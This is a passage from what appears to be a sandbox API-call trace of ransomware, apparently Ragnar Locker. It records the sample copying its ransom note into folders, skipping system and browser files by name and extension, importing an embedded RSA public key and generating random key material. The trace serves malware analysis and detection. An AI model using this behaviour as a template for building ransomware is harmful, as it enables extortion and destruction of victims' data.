dwFlags=0x0, lpMem=0x3586aa0 | out: hHeap=0x3520000) returned 1 [0177.418] CloseHandle (hObject=0x3b4) returned 1 [0177.418] GetProcessHeap () returned 0x3520000 [0177.418] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0177.735] CloseHandle (hObject=0x3f0) returned 1 [0177.736] GetProcessHeap () returned 0x3520000 [0177.736] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0177.736] FindClose (in: hFindFile=0x3547ac0 | out: hFindFile=0x3547ac0) returned 1 [0177.738] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2070", cAlternateFileName="")) returned 1 [0177.738] lstrcmpiW (lpString1="2070", lpString2=".") returned 1 [0177.738] lstrcmpiW (lpString1="2070", lpString2="..") returned 1 [0177.738] lstrcmpiW (lpString1="2070", lpString2="Windows") returned -1 [0177.738] lstrcmpiW (lpString1="2070", lpString2="Windows.old") returned -1 [0177.738] lstrcmpiW (lpString1="2070", lpString2="Tor browser") returned -1 [0177.738] lstrcmpiW (lpString1="2070", lpString2="Internet Explorer") returned -1 [0177.738] lstrcmpiW (lpString1="2070", lpString2="Google") returned -1 [0177.738] lstrcmpiW (lpString1="2070", lpString2="Opera") returned -1 [0177.738] lstrcmpiW (lpString1="2070", lpString2="Opera Software") returned -1 [0177.738] lstrcmpiW (lpString1="2070", lpString2="Mozilla") returned -1 [0177.738] lstrcmpiW (lpString1="2070", lpString2="Mozilla Firefox") returned -1 [0177.738] lstrcmpiW (lpString1="2070", lpString2="$Recycle.Bin") returned 1 [0177.738] lstrcmpiW (lpString1="2070", lpString2="ProgramData") returned -1 [0177.738] lstrcmpiW (lpString1="2070", lpString2="All Users") returned -1 [0177.738] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0177.738] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="2070" | out: lpString1="2070") returned="2070" [0177.739] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2070", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2070\\") returned="\\\\?\\C:\\588bce7c90097ed212\\2070\\" [0177.739] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\2070\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2070\\") returned="\\\\?\\C:\\588bce7c90097ed212\\2070\\" [0177.739] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2070\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2070\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\2070\\!$R4GN4R_B8CF767A$!.txt" [0177.739] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\2070\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0177.744] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2070\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2070\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\2070\\*.*" [0177.744] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\2070\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0177.744] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0177.745] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0177.745] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547ac0 [0177.745] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0177.745] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf7481d37, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.746] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0177.746] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0177.746] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7481d37, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf7481d37, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0177.746] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0177.746] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0177.746] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0177.746] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0177.746] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0177.746] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1397e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0177.747] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0177.747] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0177.747] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0177.747] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0177.747] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0177.747] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0177.747] FindClose (in: hFindFile=0x3547ac0 | out: hFindFile=0x3547ac0) returned 1 [0177.748] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547ac0 [0177.748] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf7481d37, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf7481d37, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.749] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7481d37, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf7481d37, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0177.750] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\2070\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0177.750] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0177.750] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2070\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0177.750] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0177.750] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0177.750] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\2070\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0177.750] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0177.750] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf") returned=".rtf" [0177.750] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0177.750] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0177.750] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0177.750] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0177.750] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0177.750] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0177.750] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0177.750] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0177.750] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0177.750] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0177.751] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0177.751] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0177.751] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0177.751] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0177.751] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0177.751] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0177.751] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0177.751] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0177.751] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0177.751] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0177.751] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0177.752] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0177.752] GetProcessHeap () returned 0x3520000 [0177.752] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0177.753] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" [0177.753] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1397e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0177.753] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\2070\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0177.753] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0177.753] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned=".xml" [0177.753] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0177.753] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0177.753] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0177.753] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0177.753] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0177.753] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0177.753] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0177.753] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0177.754] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0177.754] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0177.754] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0177.754] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0177.754] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0177.754] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0177.754] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0177.754] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0177.754] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0177.754] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0177.754] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0177.754] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0177.754] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0177.754] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0177.754] GetProcessHeap () returned 0x3520000 [0177.754] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0177.755] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" [0177.755] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0177.755] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\2070\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0177.755] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0177.755] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned=".dll" [0177.755] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0177.755] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0177.756] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0177.756] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0177.756] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0177.756] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0177.756] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0177.756] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0177.756] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0177.756] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0177.756] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0177.756] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0177.756] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0177.756] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0177.756] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0177.756] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0177.756] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0177.756] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0177.756] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0177.756] GetProcessHeap () returned 0x3520000 [0177.756] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x3586af0 [0177.757] CryptAcquireContextW (in: phProv=0x3586af0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3586af0*=0x5d26410) returned 1 [0177.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0177.757] GetProcessHeap () returned 0x3520000 [0177.757] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x358ec10 [0177.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x358ec10, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0177.757] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0177.758] GetProcessHeap () returned 0x3520000 [0177.758] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35cdc78 [0177.758] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0177.758] GetProcessHeap () returned 0x3520000 [0177.758] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x358ec10 | out: hHeap=0x3520000) returned 1 [0177.758] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35cdc78, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0177.758] CryptImportPublicKeyInfo (in: hCryptProv=0x5d26410, dwCertEncodingType=0x1, pInfo=0x35948f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3594920*, PublicKey.cbData=0x10e, PublicKey.pbData=0x3594928*, PublicKey.cUnusedBits=0x0), phKey=0x3586af4 | out: phKey=0x3586af4*=0x3547b40) returned 1 [0177.760] GetProcessHeap () returned 0x3520000 [0177.760] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cdc78 | out: hHeap=0x3520000) returned 1 [0177.760] LocalFree (hMem=0x35948f0) returned 0x0 [0177.760] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x5d26520) returned 1 [0177.761] CryptGenRandom (in: hProv=0x5d26520, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0177.761] CryptReleaseContext (hProv=0x5d26520, dwFlags=0x0) returned 1 [0177.761] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0177.764] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x5d26af8) returned 1 [0177.764] CryptGenRandom (in: hProv=0x5d26af8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0177.764] CryptReleaseContext (hProv=0x5d26af8, dwFlags=0x0) returned 1 [0177.764] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: 